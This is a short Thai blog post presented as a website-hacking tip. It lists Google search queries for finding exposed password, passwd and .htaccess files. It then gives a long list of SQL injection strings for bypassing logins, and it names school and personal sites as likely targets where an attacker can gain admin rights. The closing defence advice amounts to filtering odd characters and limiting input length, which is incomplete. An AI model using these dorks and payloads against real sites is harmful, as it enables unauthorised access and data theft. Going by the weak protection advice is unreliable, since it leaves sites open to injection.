tip เทคนิกในวันนี้เราจะเสนอการเจาะweb siteแบบง่ายๆให้ทุกท่านได้รับรู้และป้องกันตัวเองได้โดยเริ่มจาก

การใช้ Google ค้นหาข้อมูลลับ

“Index of /admin”
“Index of /password”
“Index of /” +passwd
“Index of /” +password.txt
“Index of /mail”
“Index of /” +alluser
“Index of /” +alluser.txt
“Index of /” +.htaccess

คำสั่งอาจจะมากกว่านี้ลองเอาไปประยุกต์ใช้กันดู

คำสั่งเจาะระบบ login

or''='
' or 0=0 —
” or 0=0 —
or 0=0 —
' or 0=0 #
” or 0=0 #
or 0=0 #
' or 'x'='x
” or “x”=”x
') or ('x'='x
' or 1=1–
” or 1=1–
or 1=1–
' or a=a–
” or “a”=”a
') or ('a'='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 —
hi' or 1=1 —
hi' or 'a'='a
hi') or ('a'='a
hi”) or (“a”=”a

อันนี้เป็นการ Hack เว็บที่ใช้ฐานข้อมูลเป็น SQL ซึ่งตามที่ต่างๆก็จะอุด Bug ตรงส่วนนี้ไว้เรียบร้อยแล้ว
แต่ก็มีบางเว็บ site (Script เขียนเองซึ่งมักจะเป็นเว็บไซต์ของโรงเรียนหรือเว็บส่วนบุคคล) ที่มักจะมีรูรั่วนี้
ออกมาให้เห็น
หลังจากที่การ Login ค่าที่เป็นไปได้หลังจากการ login ก็คือ
1.ได้รับสิทธิ์ของ User นั้นๆ
2.ได้รับสิทธ์เท่ากับคนอื่นๆ
3.ได้รับสิทธ์เป็นผู้ใช้ที่อยู่อันดับแรกหรือท้ายของตาราง (admin)
4. ไม่ได้อะไร

นอกจากการอัดฉีดคำสั่งเหล่านี้ลงไปแล้วนั้นยังมีคำสั่งอื่นๆที่สามารถอัดลงไปได้อีกเช่น
SELECT * FROM User WHERE
SELECT * FROM * WHERE
'GROUP BY username;–
'employee.feild'
เป็นต้นซึ่งเป็นคำสั่ง SQL สามารถหาความรู้ได้จากที่ต่างๆใน internet

การป้องกันโดยพื้นฐานนั้นก็คือการกรองค่าอักขระแบบแปลกๆออกไปจากข้อความที่รับเข้ามาเช่น
&!@#$%^ เป็นต้นหรือการจำกัดความยาวของช่องรับข้อความก็เป็นอีกหนึ่งวิธีที่น่าสนใจ

Advertisements